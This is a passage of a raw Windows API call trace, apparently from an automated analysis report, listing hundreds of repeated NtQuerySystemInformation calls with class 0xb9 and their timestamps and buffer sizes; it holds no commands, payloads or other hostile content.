ResultLength=0x0) [0219.465] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.465] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.465] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.465] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.465] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd650, Length=0x20, ResultLength=0x0) [0219.465] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd5d0, Length=0x20, ResultLength=0x0) [0219.466] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.466] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd5d0, Length=0x20, ResultLength=0x0) [0219.466] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.466] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd5d0, Length=0x20, ResultLength=0x0) [0219.466] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.466] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.466] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.466] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd820, Length=0x20, ResultLength=0x0) [0219.466] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.466] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.466] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd8b0, Length=0x38, ResultLength=0x0) [0219.467] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd740, Length=0x20, ResultLength=0x0) [0219.467] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd6c0, Length=0x20, ResultLength=0x0) [0219.610] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.611] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd6c0, Length=0x20, ResultLength=0x0) [0219.611] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.611] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd6c0, Length=0x20, ResultLength=0x0) [0219.611] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.611] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.611] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.611] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.611] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd8b0, Length=0x38, ResultLength=0x0) [0219.611] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd740, Length=0x20, ResultLength=0x0) [0219.612] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd6c0, Length=0x20, ResultLength=0x0) [0219.612] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.612] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd6c0, Length=0x20, ResultLength=0x0) [0219.612] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.612] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd6c0, Length=0x20, ResultLength=0x0) [0219.612] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.612] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.612] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.612] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.612] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd8b0, Length=0x38, ResultLength=0x0) [0219.612] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd740, Length=0x20, ResultLength=0x0) [0219.613] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd6d0, Length=0x20, ResultLength=0x0) [0219.613] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.613] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.613] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.613] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd6d0, Length=0x20, ResultLength=0x0) [0219.613] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.613] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.613] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.613] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.613] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.613] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd9d8, Length=0x58, ResultLength=0x0) [0219.613] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd8a0, Length=0x58, ResultLength=0x0) [0219.614] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.614] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd7c0, Length=0x38, ResultLength=0x0) [0219.616] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.616] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd5f0, Length=0x28, ResultLength=0x0) [0219.616] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.616] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.616] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd5f0, Length=0x28, ResultLength=0x0) [0219.616] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.616] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.617] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd5f0, Length=0x28, ResultLength=0x0) [0219.617] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.617] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.617] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd5f0, Length=0x28, ResultLength=0x0) [0219.617] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.617] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.617] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd660, Length=0x28, ResultLength=0x0) [0219.617] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.617] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.617] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd7c0, Length=0x38, ResultLength=0x0) [0219.617] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.618] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd6e0, Length=0x28, ResultLength=0x0) [0219.620] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.620] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.620] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.621] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.621] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.621] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd6e0, Length=0x28, ResultLength=0x0) [0219.621] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.621] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.621] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd7c0, Length=0x38, ResultLength=0x0) [0219.621] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd640, Length=0x20, ResultLength=0x0) [0219.621] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd5c0, Length=0x20, ResultLength=0x0) [0219.621] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.622] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd5c0, Length=0x20, ResultLength=0x0) [0219.622] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.622] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd5c0, Length=0x20, ResultLength=0x0) [0219.622] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.622] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.622] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.622] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.622] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd7c0, Length=0x38, ResultLength=0x0) [0219.622] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd640, Length=0x20, ResultLength=0x0) [0219.622] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd5d0, Length=0x20, ResultLength=0x0) [0219.623] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.623] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.874] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.875] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd5d0, Length=0x20, ResultLength=0x0) [0219.875] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.875] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.875] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.876] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.877] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.877] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd8a0, Length=0x58, ResultLength=0x0) [0219.877] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.877] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd7c0, Length=0x38, ResultLength=0x0) [0219.880] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.880] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd5f0, Length=0x28, ResultLength=0x0) [0219.880] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.880] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.880] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd5f0, Length=0x28, ResultLength=0x0) [0219.880] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.880] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.880] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd5f0, Length=0x28, ResultLength=0x0) [0219.880] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.881] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.881] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd5f0, Length=0x28, ResultLength=0x0) [0219.881] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.881] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.881] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd660, Length=0x28, ResultLength=0x0) [0219.881] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.881] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.881] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd7c0, Length=0x38, ResultLength=0x0) [0219.881] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.881] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd6e0, Length=0x28, ResultLength=0x0) [0219.885] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.885] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.885] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.885] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.885] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.885] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd6e0, Length=0x28, ResultLength=0x0) [0219.885] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd580, Length=0x20, ResultLength=0x0) [0219.885] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd500, Length=0x20, ResultLength=0x0) [0219.886] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.886] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd500, Length=0x20, ResultLength=0x0) [0219.886] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.886] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd500, Length=0x20, ResultLength=0x0) [0219.886] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.886] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.886] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.886] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.886] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.886] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd7c0, Length=0x38, ResultLength=0x0) [0219.886] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.886] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd7c0, Length=0x38, ResultLength=0x0) [0219.887] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd640, Length=0x20, ResultLength=0x0) [0219.887] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd5d0, Length=0x20, ResultLength=0x0) [0219.887] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.887] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.887] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.887] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd5d0, Length=0x20, ResultLength=0x0) [0219.887] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.887] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.887] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.888] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.888] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.888] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd8a0, Length=0x58, ResultLength=0x0) [0219.888] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.888] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd7c0, Length=0x38, ResultLength=0x0) [0219.891] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.891] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd5f0, Length=0x28, ResultLength=0x0) [0219.891] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.892] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.892] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd5f0, Length=0x28, ResultLength=0x0) [0219.892] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.892] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.892] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd5f0, Length=0x28, ResultLength=0x0) [0219.892] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.892] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.892] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd5f0, Length=0x28, ResultLength=0x0) [0219.892] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.893] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.893] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd660, Length=0x28, ResultLength=0x0) [0219.893] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.893] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.893] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd7c0, Length=0x38, ResultLength=0x0) [0219.893] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.893] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd6e0, Length=0x28, ResultLength=0x0) [0219.896] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.896] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.896] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.896] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.897] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.897] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd6e0, Length=0x28, ResultLength=0x0) [0219.897] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.897] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.897] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd7c0, Length=0x38, ResultLength=0x0) [0219.897] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd640, Length=0x20, ResultLength=0x0) [0219.897] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd5c0, Length=0x20, ResultLength=0x0) [0219.897] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.897] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd5c0, Length=0x20, ResultLength=0x0) [0219.897] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.897] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd5c0, Length=0x20, ResultLength=0x0) [0219.897] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.898] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.898] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.898] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.898] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd7c0, Length=0x38, ResultLength=0x0) [0219.898] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd640, Length=0x20, ResultLength=0x0) [0219.898] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd5d0, Length=0x20, ResultLength=0x0) [0219.898] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.898] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.898] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.898] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd5d0, Length=0x20, ResultLength=0x0) [0219.898] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.898] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.898] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.899] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.899] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.899] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd8a0, Length=0x58, ResultLength=0x0) [0219.899] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.899] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd780, Length=0x38, ResultLength=0x0) [0219.901] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.902] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.092] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.093] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.093] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd5c0, Length=0x28, ResultLength=0x0) [0220.093] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.093] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.093] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd5c0, Length=0x28, ResultLength=0x0) [0220.093] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.093] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.093] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd5c0, Length=0x28, ResultLength=0x0) [0220.094] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.094] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.094] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd5c0, Length=0x28, ResultLength=0x0) [0220.094] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.094] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.094] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd630, Length=0x28, ResultLength=0x0) [0220.094] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.094] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.094] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd780, Length=0x38, ResultLength=0x0) [0220.095] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.095] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd780, Length=0x38, ResultLength=0x0) [0220.095] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.095] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd6b0, Length=0x28, ResultLength=0x0) [0220.097] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.098] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, 